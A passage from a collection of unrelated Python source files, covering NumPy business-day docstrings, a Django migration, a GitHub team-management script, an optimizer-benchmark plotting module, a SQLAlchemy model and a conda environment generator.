A seven-element array indicating which of Monday through Sunday are
valid days. May be specified as a length-seven list or array, like
[1,1,1,1,1,0,0]; a length-seven string, like '1111100'; or a string
like "Mon Tue Wed Thu Fri", made up of 3-character abbreviations for
weekdays, optionally separated by white space. Valid abbreviations
are: Mon Tue Wed Thu Fri Sat Sun
holidays : array_like of datetime64[D], optional
An array of dates to consider as invalid dates. They may be
specified in any order, and NaT (not-a-time) dates are ignored.
This list is saved in a normalized form that is suited for
fast calculations of valid days.
busdaycal : busdaycalendar, optional
A `busdaycalendar` object which specifies the valid days. If this
parameter is provided, neither weekmask nor holidays may be
provided.
out : array of bool, optional
If provided, this array is filled with the result.
Returns
-------
out : array of bool
An array with the same shape as ``dates``, containing True for
each valid day, and False for each invalid day.
See Also
--------
busdaycalendar : An object that specifies a custom set of valid days.
busday_offset : Applies an offset counted in valid days.
busday_count : Counts how many valid days are in a half-open date range.
Examples
--------
>>> # The weekdays are Friday, Saturday, and Monday
... np.is_busday(['2011-07-01', '2011-07-02', '2011-07-18'],
... holidays=['2011-07-01', '2011-07-04', '2011-07-17'])
array([False, False, True])
"""
return (dates, weekmask, holidays, out)
@array_function_from_c_func_and_dispatcher(_multiarray_umath.busday_offset)
def busday_offset(dates, offsets, roll=None, weekmask=None, holidays=None,
busdaycal=None, out=None):
"""
busday_offset(dates, offsets, roll='raise', weekmask='1111100', holidays=None, busdaycal=None, out=None)
First adjusts the date to fall on a valid day according to
the ``roll`` rule, then applies offsets to the given dates
counted in valid days.
.. versionadded:: 1.7.0
Parameters
----------
dates : array_like of datetime64[D]
The array of dates to process.
offsets : array_like of int
The array of offsets, which is broadcast with ``dates``.
roll : {'raise', 'nat', 'forward', 'following', 'backward', 'preceding', 'modifiedfollowing', 'modifiedpreceding'}, optional
How to treat dates that do not fall on a valid day. The default
is 'raise'.
* 'raise' means to raise an exception for an invalid day.
* 'nat' means to return a NaT (not-a-time) for an invalid day.
* 'forward' and 'following' mean to take the first valid day
later in time.
* 'backward' and 'preceding' mean to take the first valid day
earlier in time.
* 'modifiedfollowing' means to take the first valid day
later in time unless it is across a Month boundary, in which
case to take the first valid day earlier in time.
* 'modifiedpreceding' means to take the first valid day
earlier in time unless it is across a Month boundary, in which
case to take the first valid day later in time.
weekmask : str or array_like of bool, optional
A seven-element array indicating which of Monday through Sunday are
valid days. May be specified as a length-seven list or array, like
[1,1,1,1,1,0,0]; a length-seven string, like '1111100'; or a string
like "Mon Tue Wed Thu Fri", made up of 3-character abbreviations for
weekdays, optionally separated by white space. Valid abbreviations
are: Mon Tue Wed Thu Fri Sat Sun
holidays : array_like of datetime64[D], optional
An array of dates to consider as invalid dates. They may be
specified in any order, and NaT (not-a-time) dates are ignored.
This list is saved in a normalized form that is suited for
fast calculations of valid days.
busdaycal : busdaycalendar, optional
A `busdaycalendar` object which specifies the valid days. If this
parameter is provided, neither weekmask nor holidays may be
provided.
out : array of datetime64[D], optional
If provided, this array is filled with the result.
Returns
-------
out : array of datetime64[D]
An array with a shape from broadcasting ``dates`` and ``offsets``
together, containing the dates with offsets applied.
See Also
--------
busdaycalendar : An object that specifies a custom set of valid days.
is_busday : Returns a boolean array indicating valid days.
busday_count : Counts how many valid days are in a half-open date range.
Examples
--------
>>> # First business day in October 2011 (not accounting for holidays)
... np.busday_offset('2011-10', 0, roll='forward')
numpy.datetime64('2011-10-03')
>>> # Last business day in February 2012 (not accounting for holidays)
... np.busday_offset('2012-03', -1, roll='forward')
numpy.datetime64('2012-02-29')
>>> # Third Wednesday in January 2011
... np.busday_offset('2011-01', 2, roll='forward', weekmask='Wed')
numpy.datetime64('2011-01-19')
>>> # 2012 Mother's Day in Canada and the U.S.
... np.busday_offset('2012-05', 1, roll='forward', weekmask='Sun')
numpy.datetime64('2012-05-13')
>>> # First business day on or after a date
... np.busday_offset('2011-03-20', 0, roll='forward')
numpy.datetime64('2011-03-21')
>>> np.busday_offset('2011-03-22', 0, roll='forward')
numpy.datetime64('2011-03-22')
>>> # First business day after a date
... np.busday_offset('2011-03-20', 1, roll='backward')
numpy.datetime64('2011-03-21')
>>> np.busday_offset('2011-03-22', 1, roll='backward')
numpy.datetime64('2011-03-23')
"""
return (dates, offsets, weekmask, holidays, out)
@array_function_from_c_func_and_dispatcher(_multiarray_umath.busday_count)
def busday_count(begindates, enddates, weekmask=None, holidays=None,
busdaycal=None, out=None):
"""
busday_count(begindates, enddates, weekmask='1111100', holidays=[], busdaycal=None, out=None)
Counts the number of valid days between `begindates` and
`enddates`, not including the day of `enddates`.
If ``enddates`` specifies a date value that is earlier than the
corresponding ``begindates`` date value, the count will be negative.
.. versionadded:: 1.7.0
Parameters
----------
begindates : array_like of datetime64[D]
The array of the first dates for counting.
enddates : array_like of datetime64[D]
The array of the end dates for counting, which are excluded
from the count themselves.
weekmask : str or array_like of bool, optional
A seven-element array indicating which of Monday through Sunday are
valid days. May be specified as a length-seven list or array, like
[1,1,1,1,1,0,0]; a length-seven string, like '1111100'; or a string
like "Mon Tue Wed Thu Fri", made up of 3-character abbreviations for
weekdays, optionally separated by white space. Valid abbreviations
are: Mon Tue Wed Thu Fri Sat Sun
holidays : array_like of datetime64[D], optional
An array of dates to consider as invalid dates. They may be
specified in any order, and NaT (not-a-time) dates are ignored.
This list is saved in a normalized form that is suited for
fast calculations of valid days.
busdaycal : busdaycalendar, optional
A `busdaycalendar` object which specifies the valid days. If this
parameter is provided, neither weekmask nor holidays may be
provided.
out : array of int, optional
If provided, this array is filled with the result.
Returns
-------
out : array of int
An array with a shape from broadcasting ``begindates`` and ``enddates``
together, containing the number of valid days between
the begin and end dates.
See Also
--------
busdaycalendar : An object that specifies a custom set of valid days.
is_busday : Returns a boolean array indicating valid days.
busday_offset : Applies an offset counted in valid days.
Examples
--------
>>> # Number of weekdays in January 2011
... np.busday_count('2011-01', '2011-02')
21
>>> # Number of weekdays in 2011
>>> np.busday_count('2011', '2012')
260
>>> # Number of Saturdays in 2011
... np.busday_count('2011', '2012', weekmask='Sat')
53
"""
return (begindates, enddates, weekmask, holidays, out)
@array_function_from_c_func_and_dispatcher(
_multiarray_umath.datetime_as_string)
def datetime_as_string(arr, unit=None, timezone=None, casting=None):
"""
datetime_as_string(arr, unit=None, timezone='naive', casting='same_kind')
Convert an array of datetimes into an array of strings.
Parameters
----------
arr : array_like of datetime64
The array of UTC timestamps to format.
unit : str
One of None, 'auto', or a :ref:`datetime unit <arrays.dtypes.dateunits>`.
timezone : {'naive', 'UTC', 'local'} or tzinfo
Timezone information to use when displaying the datetime. If 'UTC', end
with a Z to indicate UTC time. If 'local', convert to the local timezone
first, and suffix with a +-#### timezone offset. If a tzinfo object,
then do as with 'local', but use the specified timezone.
casting : {'no', 'equiv', 'safe', 'same_kind', 'unsafe'}
Casting to allow when changing between datetime units.
Returns
-------
str_arr : ndarray
An array of strings the same shape as `arr`.
Examples
--------
>>> import pytz
>>> d = np.arange('2002-10-27T04:30', 4*60, 60, dtype='M8[m]')
>>> d
array(['2002-10-27T04:30', '2002-10-27T05:30', '2002-10-27T06:30',
'2002-10-27T07:30'], dtype='datetime64[m]')
Setting the timezone to UTC shows the same information, but with a Z suffix
>>> np.datetime_as_string(d, timezone='UTC')
array(['2002-10-27T04:30Z', '2002-10-27T05:30Z', '2002-10-27T06:30Z',
'2002-10-27T07:30Z'], dtype='<U35')
Note that we picked datetimes that cross a DST boundary. Passing in a
``pytz`` timezone object will print the appropriate offset
>>> np.datetime_as_string(d, timezone=pytz.timezone('US/Eastern'))
array(['2002-10-27T00:30-0400', '2002-10-27T01:30-0400',
'2002-10-27T01:30-0500', '2002-10-27T02:30-0500'], dtype='<U39')
Passing in a unit will change the precision
>>> np.datetime_as_string(d, unit='h')
array(['2002-10-27T04', '2002-10-27T05', '2002-10-27T06', '2002-10-27T07'],
dtype='<U32')
>>> np.datetime_as_string(d, unit='s')
array(['2002-10-27T04:30:00', '2002-10-27T05:30:00', '2002-10-27T06:30:00',
'2002-10-27T07:30:00'], dtype='<U38')
'casting' can be used to specify whether precision can be changed
>>> np.datetime_as_string(d, unit='h', casting='safe')
Traceback (most recent call last):
...
TypeError: Cannot create a datetime string as units 'h' from a NumPy
datetime with units 'm' according to the rule 'safe'
"""
return (arr,)
|
py | 1a37edc740cc89c117faa7260208793769631655 | # Generated by Django 3.1.8 on 2021-08-24 13:15
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
("organizations", "0032_auto_20210824_1457"),
("permissions", "0008_auto_20210824_1500"),
]
operations = [
migrations.AlterField(
model_name="responsiblegroup",
name="organization",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="permission_groups",
to="organizations.organization",
),
),
]
|
py | 1a37ee4ba755a1a25a644e23caa415d8308d0475 | # Third party
from github import UnknownObjectException
# Local
from utils import (
set_up_github_client,
get_cc_organization,
get_team_slug_name
)
PERMISSIONS = {
'Project Contributor': None,
'Project Collaborator': 'triage',
'Project Core Committer': 'push',
'Project Maintainer': 'maintain'
}
def create_teams_for_data(databag):
client = set_up_github_client()
organization = get_cc_organization(client)
print("Creating and populating teams...")
projects = databag["projects"]
for project in projects:
project_name = project["name"]
print(f" Creating and populating teams for project {project_name}...")
roles = project["roles"]
for role, members in roles.items():
if PERMISSIONS[role] is None:
print(f" Skipping {role} as it has no privileges.")
continue
print(f" Finding team for role {role}...")
team = map_role_to_team(organization, project_name, role)
print(" Done.")
print(f" Populating repos for team {team.name}...")
repos = project["repos"]
map_team_to_repos(organization, team, repos, True)
set_team_repo_permissions(team, PERMISSIONS[role])
print(" Done.")
print(f" Populating members for team {team.name}...")
members = [member["github"] for member in members]
map_team_to_members(client, team, members, True)
print(" Done.")
print(" Done.")
print("Done.")
def map_team_to_members(client, team, final_user_logins, non_destructive=False):
"""
Map the team to the given set of members. Any members that are not already
a part of the team will be added and any additional members that are a part
of the team will be removed, unless chosen not to.
@param client: the GitHub client
@param team: the Team object representing the team
@param final_user_logins: the list of users to associate with the team
    @param non_destructive: whether to remove extra members or preserve them
"""
initial_users = team.get_members()
initial_user_logins = [user.login for user in initial_users]
if not non_destructive:
users_to_drop = [
member
for member in initial_users
if member.login not in final_user_logins
]
for user in users_to_drop:
team.remove_membership(user)
users_to_add = [
client.get_user(login)
for login in final_user_logins
if login not in initial_user_logins
]
for user in users_to_add:
team.add_membership(user)
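    # Creating a team automatically adds the authenticated user to it, so drop
    # the current user again unless they belong in the final membership list.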
current_login = client.get_user().login
if current_login not in final_user_logins:
current_user = client.get_user(current_login)
team.remove_membership(current_user)
def map_team_to_repos(organization, team, final_repo_names, non_destructive=False):
"""
Map the team to the given set of repositories. Any repositories that are
not already a part of the team will be added and any additional repositories
that are a part of the team will be removed, unless chosen not to.
    @param organization: the Organization object of which the team is a part
@param team: the Team object representing the team
@param final_repo_names: the list of repo names to associate with the team
@param non_destructive: whether to trim extra repos or preserve them
"""
initial_repos = team.get_repos()
initial_repo_names = [repo.name for repo in initial_repos]
if not non_destructive:
repos_to_drop = [
repo
for repo in initial_repos
if repo.name not in final_repo_names
]
for repo in repos_to_drop:
team.remove_from_repos(repo)
repos_to_add = [
organization.get_repo(repo_name)
for repo_name in final_repo_names
if repo_name not in initial_repo_names
]
for repo in repos_to_add:
team.add_to_repos(repo)
def set_team_repo_permissions(team, permission):
"""
Set the given permission for each repository belonging to the team. The
    permissions are determined by the role corresponding to the team.
@param team: the team to update the permissions for
@param permission: the permission to set on each repo assigned to the team
"""
repos = team.get_repos()
for repo in repos:
print(f" Populating {permission} permission on {repo} repo...")
team.set_repo_permission(repo, permission)
print(" Done.")
def map_role_to_team(organization, project_name, role, create_if_absent=True):
"""
Map the given role in the given project to a team. Creates the team if one
such does not already exist.
    @param organization: the Organization object of which the team is a part
@param project_name: the name of the project to which the team belongs
@param role: the role held by folks in the team
@param create_if_absent: whether to create the team if it does not exist
@return: the team associated with the role
"""
team_slug, team_name = get_team_slug_name(project_name, role)
properties = {
'name': team_name,
'description': (f'Community Team for {project_name} '
f'containing folks with the role "{role}"'),
'privacy': 'closed'
}
try:
team = organization.get_team_by_slug(team_slug)
print(" Team exists, reconciling...")
if team.description == properties['description']:
del properties['description']
if team.privacy == properties['privacy']:
del properties['privacy']
if properties:
team.edit(**properties)
print(" Done.")
except UnknownObjectException:
if not create_if_absent:
print(" Did not exist, not creating.")
team = None
else:
print(" Did not exist, creating...")
team = organization.create_team(**properties)
print(" Done.")
return team
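if __name__ == "__main__":
    # A minimal, hypothetical invocation sketch: this databag layout is only
    # inferred from how create_teams_for_data reads it, and the names below
    # are placeholders rather than real projects or users. Running it requires
    # whatever credentials set_up_github_client expects.
    sample_databag = {
        "projects": [
            {
                "name": "example-project",
                "repos": ["example-repo"],
                "roles": {
                    "Project Maintainer": [{"github": "octocat"}],
                    "Project Contributor": [{"github": "hubot"}],
                },
            }
        ]
    }
    create_teams_for_data(sample_databag)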
|
py | 1a37eed3548a443d289184970fb4917881533984 | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import os
import argparse
import itertools
from pathlib import Path
from typing import Iterator, List, Optional, Any
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
from matplotlib import cm
from ..common import tools
from ..common.typetools import PathLike
# pylint: disable=too-many-locals
_DPI = 100
# %% Basic tools
def _make_style_generator() -> Iterator[str]:
lines = itertools.cycle(["-", "--", ":", "-."]) # 4
markers = itertools.cycle("ov^<>8sp*hHDd") # 13
colors = itertools.cycle("bgrcmyk") # 7
    return (line + marker + color for line, marker, color in zip(lines, markers, colors))
class NameStyle(dict):
"""Provides a style for each name, and keeps to it
"""
def __init__(self) -> None:
super().__init__()
self._gen = _make_style_generator()
def __getitem__(self, name: str) -> Any:
if name not in self:
self[name] = next(self._gen)
return super().__getitem__(name)
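# NameStyle hands out a stable line style per optimizer name; with the cycles
# defined above, the first lookup yields "-ob" and repeats thereafter:
#
#     >>> style = NameStyle()
#     >>> style["CMA"]
#     '-ob'
#     >>> style["CMA"]
#     '-ob'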
def _make_winners_df(df: pd.DataFrame, all_optimizers: List[str]) -> tools.Selector:
"""Finds mean loss over all runs for each of the optimizers, and creates a matrix
    winner_ij = 1 if opt_i is better (lower loss) than opt_j (and .5 for ties)
"""
if not isinstance(df, tools.Selector):
df = tools.Selector(df)
all_optim_set = set(all_optimizers)
assert all(x in all_optim_set for x in df.unique("optimizer_name"))
assert all(x in df.columns for x in ["optimizer_name", "loss"])
winners = tools.Selector(index=all_optimizers, columns=all_optimizers, data=0.)
grouped = df.loc[:, ["optimizer_name", "loss"]].groupby(["optimizer_name"]).mean()
df_optimizers = list(grouped.index)
values = np.array(grouped)
diffs = values - values.T
    # winner_ij = 1 means opt_i beats opt_j once (beating means getting a lower loss/regret)
winners.loc[df_optimizers, df_optimizers] = (diffs < 0) + .5 * (diffs == 0)
return winners
def _make_sorted_winrates_df(victories: pd.DataFrame) -> pd.DataFrame:
"""Converts a dataframe counting number of victories into a sorted
winrate dataframe. The algorithm which performs better than all other
algorithms comes first.
"""
assert all(x == y for x, y in zip(victories.index, victories.columns))
winrates = victories / (victories + victories.T)
mean_win = winrates.mean(axis=1).sort_values(ascending=False)
return winrates.loc[mean_win.index, mean_win.index]
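# A hypothetical worked example of the two helpers above: with optimizers A
# and B over 4 sub-cases, where A beats B in 3 of them and they tie once,
# _make_winners_df accumulates victories = [[2.0, 3.5], [0.5, 2.0]] (ties and
# the diagonal each count 0.5 per sub-case), so _make_sorted_winrates_df gives
# winrates[A, B] = 3.5 / (3.5 + 0.5) = 0.875 and sorts A first.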
# %% plotting functions
def remove_errors(df: pd.DataFrame) -> tools.Selector:
df = tools.Selector(df)
if "error" not in df.columns: # backward compatibility
return df # type: ignore
# errors with no recommendation
errordf = df.select(error=lambda x: isinstance(x, str) and x, loss=np.isnan)
for _, row in errordf.iterrows():
print(f'Removing "{row["optimizer_name"]}" with dimension {row["dimension"]}: got error "{row["error"]}".')
    # errors with recorded recommendations
handlederrordf = df.select(error=lambda x: isinstance(x, str) and x, loss=lambda x: not np.isnan(x))
for _, row in handlederrordf.iterrows():
print(f'Keeping non-optimal recommendation of "{row["optimizer_name"]}" '
f'with dimension {row["dimension"]} which raised "{row["error"]}".')
err_inds = set(errordf.index)
output = df.loc[[i for i in df.index if i not in err_inds], [c for c in df.columns if c != "error"]]
assert not output.loc[:, "loss"].isnull().values.any(), "Some nan values remain while there should not be any!"
output = tools.Selector(output.reset_index(drop=True))
return output # type: ignore
def create_plots(df: pd.DataFrame, output_folder: PathLike, max_combsize: int = 1) -> None:
"""Saves all representing plots to the provided folder
Parameters
----------
df: pd.DataFrame
the experiment data
output_folder: PathLike
path of the folder where the plots should be saved
max_combsize: int
maximum number of parameters to fix (combinations) when creating experiment plots
"""
df = remove_errors(df)
df.loc[:, "loss"] = pd.to_numeric(df.loc[:, "loss"])
df = tools.Selector(df.fillna("N-A")) # remove NaN in non score values
assert not any("Unnamed: " in x for x in df.columns), f"Remove the unnamed index column: {df.columns}"
assert "error " not in df.columns, f"Remove error rows before plotting"
required = {"optimizer_name", "budget", "loss", "elapsed_time", "elapsed_budget"}
missing = required - set(df.columns)
assert not missing, f"Missing fields: {missing}"
output_folder = Path(output_folder)
os.makedirs(output_folder, exist_ok=True)
# check which descriptors do vary
descriptors = sorted(set(df.columns) - (required | {"seed"})) # all other columns are descriptors
to_drop = [x for x in descriptors if len(df.unique(x)) == 1]
df = tools.Selector(df.loc[:, [x for x in df.columns if x not in to_drop]])
descriptors = sorted(set(df.columns) - (required | {"seed"})) # now those should be actual interesting descriptors
print(f"Descriptors: {descriptors}")
#
# fight plot
# choice of the combination variables to fix
fight_descriptors = descriptors + ["budget"] # budget can be used as a descriptor for fight plots
combinable = [x for x in fight_descriptors if len(df.unique(x)) > 1] # should be all now
num_rows = 6
for fixed in list(itertools.chain.from_iterable(itertools.combinations(combinable, order) for order in range(max_combsize + 1))):
# choice of the cases with values for the fixed variables
for case in df.unique(fixed):
print("\n# new case #", fixed, case)
casedf = df.select(**dict(zip(fixed, case)))
name = "fight_" + ",".join("{}{}".format(x, y) for x, y in zip(fixed, case)) + ".png"
name = "fight_all.png" if name == "fight_.png" else name
make_fight_plot(casedf, fight_descriptors, num_rows, output_folder / name)
plt.close("all")
#
# xp plots
# plot mean loss / budget for each optimizer for 1 context
name_style = NameStyle() # keep the same style for each algorithm
for case in df.unique(descriptors):
subdf = df.select_and_drop(**dict(zip(descriptors, case)))
description = ",".join("{}:{}".format(x, y) for x, y in zip(descriptors, case))
out_filepath = output_folder / "xpresults{}{}.png".format("_" if description else "", description.replace(":", ""))
make_xpresults_plot(subdf, description, out_filepath, name_style)
plt.close("all")
def make_xpresults_plot(df: pd.DataFrame, title: str, output_filepath: Optional[PathLike] = None,
name_style: Optional[dict] = None) -> None:
"""Creates a xp result plot out of the given dataframe: regret with respect to budget for
each optimizer after averaging on all experiments (it is good practice to use a df
which is filtered out for one set of input parameters)
Parameters
----------
df: pd.DataFrame
run data
title: str
title of the plot
output_filepath: Path
If present, saves the plot to the given path
name_style: dict
a dict or dict-like object providing a line style for each optimizer name.
(can be helpful for consistency across plots)
"""
if name_style is None:
name_style = NameStyle()
df = tools.Selector(df.loc[:, ["optimizer_name", "budget", "loss"]])
groupeddf = df.groupby(["optimizer_name", "budget"]).mean()
groupeddf_std = df.groupby(["optimizer_name", "budget"]).std().loc[groupeddf.index, :] # std is currently unused
plt.clf()
plt.xlabel("Budget")
plt.ylabel("Loss")
plt.grid(True, which='both')
optim_vals = {}
# extract name and coordinates
for optim in df.unique("optimizer_name"):
xvals = np.array(groupeddf.loc[optim, :].index)
yvals = np.maximum(1e-30, np.array(groupeddf.loc[optim, :].loc[:, "loss"])) # avoid small vals for logplot
stds = groupeddf_std.loc[optim, :].loc[:, "loss"]
optim_name = optim.replace("Search", "").replace("oint", "t").replace("Optimizer", "")
optim_vals[optim_name] = {"x": xvals, "y": yvals, "std": stds}
    # cap the plot's upper bound at twice the worst loss of the "stupid"/"idiot" baselines
upperbound = max(np.max(vals["y"]) for vals in optim_vals.values())
for optim, vals in optim_vals.items():
if optim.lower() in ["stupid", "idiot"] or optim in ["Zero", "StupidRandom"]:
upperbound = min(upperbound, 2 * np.max(vals["y"]))
# plot from best to worst
lowerbound = np.inf
handles = []
sorted_optimizers = sorted(optim_vals, key=lambda x: optim_vals[x]["y"][-1], reverse=True)
for k, optim_name in enumerate(sorted_optimizers):
vals = optim_vals[optim_name]
lowerbound = min(lowerbound, np.min(vals["y"]))
handles.append(plt.loglog(vals["x"], vals["y"], name_style[optim_name], label=optim_name))
texts = []
if vals["x"].size and vals["y"][-1] < upperbound:
angle = 30 - 60 * k / len(optim_vals)
texts.append(plt.text(vals["x"][-1], vals["y"][-1], "{} ({:.3g})".format(optim_name, vals["y"][-1]),
{'ha': 'left', 'va': 'top' if angle < 0 else 'bottom'}, rotation=angle))
if upperbound < np.inf:
plt.gca().set_ylim(lowerbound, upperbound)
# global info
legend = plt.legend(fontsize=7, ncol=2, handlelength=3,
loc='upper center', bbox_to_anchor=(0.5, -0.15))
plt.title(title)
# plt.tight_layout()
# plt.axis('tight')
# plt.tick_params(axis='both', which='both')
if output_filepath is not None:
plt.savefig(str(output_filepath), bbox_extra_artists=[legend] + texts, bbox_inches='tight', dpi=_DPI)
def make_fight_plot(df: tools.Selector, categories: List[str], num_rows: int, output_filepath: Optional[PathLike] = None) -> None:
"""Creates a fight plot out of the given dataframe, by iterating over all cases with fixed category variables.
Parameters
----------
df: pd.DataFrame
run data
categories: list
List of variables to fix for obtaining similar run conditions
num_rows: int
number of rows to plot (best algorithms)
output_filepath: Path
If present, saves the plot to the given path
"""
all_optimizers = list(df.unique("optimizer_name")) # optimizers for which no run exists are not shown
num_rows = min(num_rows, len(all_optimizers))
victories = pd.DataFrame(index=all_optimizers, columns=all_optimizers, data=0.)
# iterate on all sub cases
subcases = df.unique(categories)
for subcase in subcases: # TODO linearize this (precompute all subcases)? requires memory
subdf = df.select(**dict(zip(categories, subcase)))
victories += _make_winners_df(subdf, all_optimizers)
winrates = _make_sorted_winrates_df(victories)
mean_win = winrates.mean(axis=1)
    winrates = winrates.fillna(.5)  # unplayed match-ups count as a draw
sorted_names = winrates.index
# number of subcases actually computed is twice self-victories
sorted_names = ["{} ({}/{})".format(n, int(2 * victories.loc[n, n]), len(subcases)) for n in sorted_names]
data = np.array(winrates.iloc[:num_rows, :])
# make plot
plt.close("all")
fig = plt.figure()
ax = fig.add_subplot(111)
cax = ax.imshow(100 * data, cmap=cm.seismic, interpolation='none', vmin=0, vmax=100)
ax.set_xticks(list(range(len(sorted_names))))
ax.set_xticklabels([s.replace("Search", "") for s in sorted_names], rotation=90, fontsize=7)
ax.set_yticks(list(range(num_rows)))
# pylint: disable=anomalous-backslash-in-string
ax.set_yticklabels([(f"{name} ({100 * val:2.1f}\%)").replace("Search", "") for name, val in zip(mean_win.index[: num_rows], mean_win)], rotation=45, fontsize=7)
plt.tight_layout()
fig.colorbar(cax, orientation='vertical')
if output_filepath is not None:
plt.savefig(str(output_filepath), dpi=_DPI)
def main() -> None:
parser = argparse.ArgumentParser(description='Create plots from an experiment data file')
parser.add_argument('filepath', type=str, help='filepath containing the experiment data')
    parser.add_argument('--output', type=str, default=None,
                        help="Output folder for the plots (default: a folder <filename>_plots next to the data file).")
parser.add_argument('--max_combsize', type=int, default=3,
help="maximum number of parameters to fix (combinations) when creating experiment plots")
args = parser.parse_args()
exp_df = tools.Selector.read_csv(args.filepath)
output_dir = args.output
if output_dir is None:
output_dir = str(Path(args.filepath).with_suffix("")) + "_plots"
create_plots(exp_df, output_folder=output_dir, max_combsize=args.max_combsize)
if __name__ == '__main__':
main()
|
py | 1a37efac3b6c597e44346348849821a665cdaa87 | from sqlalchemy import Column, Integer, String, Boolean
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship, sessionmaker
from sqlalchemy import create_engine
Base = declarative_base()
class Knowledge(Base):
    # Create a table with five columns.
    # The first column is an auto-incrementing primary key. The next
    # two columns are strings: the topic you want to learn about and
    # the topic the referenced Wiki article covers. The fourth column
    # is a string holding the article's title, and the last column is
    # an integer representing your rating of the article.
    __tablename__ = 'articles'
    article_id = Column(Integer, primary_key=True)
    topic_name = Column(String)
    article_topic = Column(String)
    article_title = Column(String)
    rating = Column(Integer)
def __repr__(self):
return "If you want to learn about {} you should look at the {} article about {}\n" \
"We gave this article a rating of {}" .format(self.topic_name,self.article_title,self.article_topic,self.rating)
|
py | 1a37efb1bab8ec5abfbdc1ab8487b315edf20485 | #!/usr/bin/python
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License.
# This script creates yaml files to build conda environments
# For generating a conda file for running only python code:
# $ python generate_conda_file.py
# For generating a conda file for running python gpu:
# $ python generate_conda_file.py --gpu
# For generating a conda file for running pyspark:
# $ python generate_conda_file.py --pyspark
# For generating a conda file for running python gpu and pyspark:
# $ python generate_conda_file.py --gpu --pyspark
# For generating a conda file for running python gpu and pyspark with a particular version:
# $ python generate_conda_file.py --gpu --pyspark-version 2.4.0
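# Illustrative fragment of a generated file (the exact packages and pins
# come from the dictionaries below; this sample is not verbatim output):
#   name: reco_base
#   channels:
#   - defaults
#   dependencies:
#   - python==3.6.8
#   - pip:
#     - tqdm==4.31.1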
import argparse
import textwrap
from sys import platform
HELP_MSG = """
To create the conda environment:
$ conda env create -f {conda_env}.yaml
To update the conda environment:
$ conda env update -f {conda_env}.yaml
To register the conda environment in Jupyter:
$ conda activate {conda_env}
$ python -m ipykernel install --user --name {conda_env} --display-name "Python ({conda_env})"
"""
CHANNELS = ["defaults", "conda-forge", "pytorch", "fastai"]
CONDA_BASE = {
"bottleneck": "bottleneck==1.2.1",
"dask": "dask>=0.17.1",
"fastparquet": "fastparquet>=0.1.6",
"ipykernel": "ipykernel>=4.6.1",
"jupyter": "jupyter>=1.0.0",
"matplotlib": "matplotlib>=2.2.2",
"mock": "mock==2.0.0",
"numpy": "numpy>=1.13.3",
"pandas": "pandas>=0.23.4",
"pip": "pip>=19.0.3",
"python": "python==3.6.8",
"pytest": "pytest>=3.6.4",
"pytorch": "pytorch-cpu>=1.0.0",
"seaborn": "seaborn>=0.8.1",
"scikit-learn": "scikit-learn==0.19.1",
"scipy": "scipy>=1.0.0",
"scikit-surprise": "scikit-surprise>=1.0.6",
"swig": "swig==3.0.12",
"tensorflow": "tensorflow==1.12.0",
"lightgbm": "lightgbm==2.2.1",
"cornac": "cornac>=1.1.2",
"fastai": "fastai==1.0.46",
"papermill": "papermill==0.19.1",
}
CONDA_PYSPARK = {"pyarrow": "pyarrow>=0.8.0", "pyspark": "pyspark==2.3.1"}
CONDA_GPU = {
"numba": "numba>=0.38.1",
"pytorch": "pytorch>=1.0.0",
"tensorflow": "tensorflow-gpu==1.12.0",
}
PIP_BASE = {
"azureml-sdk[notebooks,tensorboard]": "azureml-sdk[notebooks,tensorboard]==1.0.18",
"azure-storage": "azure-storage>=0.36.0",
"black": "black>=18.6b4",
"category_encoders": "category_encoders>=1.3.0",
"dataclasses": "dataclasses>=0.6",
"hyperopt": "hyperopt==0.1.1",
"idna": "idna==2.7",
"locustio": "locustio==0.11.0",
"memory-profiler": "memory-profiler>=0.54.0",
"nbconvert": "nbconvert==5.5.0",
"pydocumentdb": "pydocumentdb>=2.3.3",
"pymanopt": "pymanopt==0.2.3",
"tqdm": "tqdm==4.31.1",
}
PIP_GPU = {"nvidia-ml-py3": "nvidia-ml-py3>=7.352.0"}
PIP_PYSPARK = {"databricks-cli": "databricks-cli==0.8.6"}
PIP_DARWIN = {
"nni": "nni==0.5.2.1.1",
}
PIP_LINUX = {
"nni": "nni==0.5.2.1.1",
}
PIP_WIN32 = {}
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description=textwrap.dedent(
"""
This script generates a conda file for different environments.
Plain python is the default, but flags can be used to support PySpark and GPU functionality"""
),
epilog=HELP_MSG,
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument("--name", help="specify name of conda environment")
parser.add_argument(
"--gpu", action="store_true", help="include packages for GPU support"
)
parser.add_argument(
"--pyspark", action="store_true", help="include packages for PySpark support"
)
parser.add_argument(
"--pyspark-version", help="provide specific version of PySpark to use"
)
args = parser.parse_args()
# check pyspark version
if args.pyspark_version is not None:
args.pyspark = True
pyspark_version_info = args.pyspark_version.split(".")
if len(pyspark_version_info) != 3 or any(
[not x.isdigit() for x in pyspark_version_info]
):
raise TypeError(
"PySpark version input must be valid numeric format (e.g. --pyspark-version=2.3.1)"
)
else:
args.pyspark_version = "2.3.1"
# set name for environment and output yaml file
conda_env = "reco_base"
if args.gpu and args.pyspark:
conda_env = "reco_full"
elif args.gpu:
conda_env = "reco_gpu"
elif args.pyspark:
conda_env = "reco_pyspark"
# overwrite environment name with user input
if args.name is not None:
conda_env = args.name
# update conda and pip packages based on flags provided
    conda_packages = dict(CONDA_BASE)  # copy so the module-level dicts are not mutated
    pip_packages = dict(PIP_BASE)
if args.pyspark:
conda_packages.update(CONDA_PYSPARK)
conda_packages["pyspark"] = "pyspark=={}".format(args.pyspark_version)
pip_packages.update(PIP_PYSPARK)
if args.gpu:
conda_packages.update(CONDA_GPU)
pip_packages.update(PIP_GPU)
# check for os platform support
if platform == 'darwin':
pip_packages.update(PIP_DARWIN)
elif platform.startswith('linux'):
pip_packages.update(PIP_LINUX)
elif platform == 'win32':
pip_packages.update(PIP_WIN32)
else:
raise Exception('Unsupported platform, must be Windows, Linux, or macOS')
# write out yaml file
conda_file = "{}.yaml".format(conda_env)
with open(conda_file, "w") as f:
for line in HELP_MSG.format(conda_env=conda_env).split("\n"):
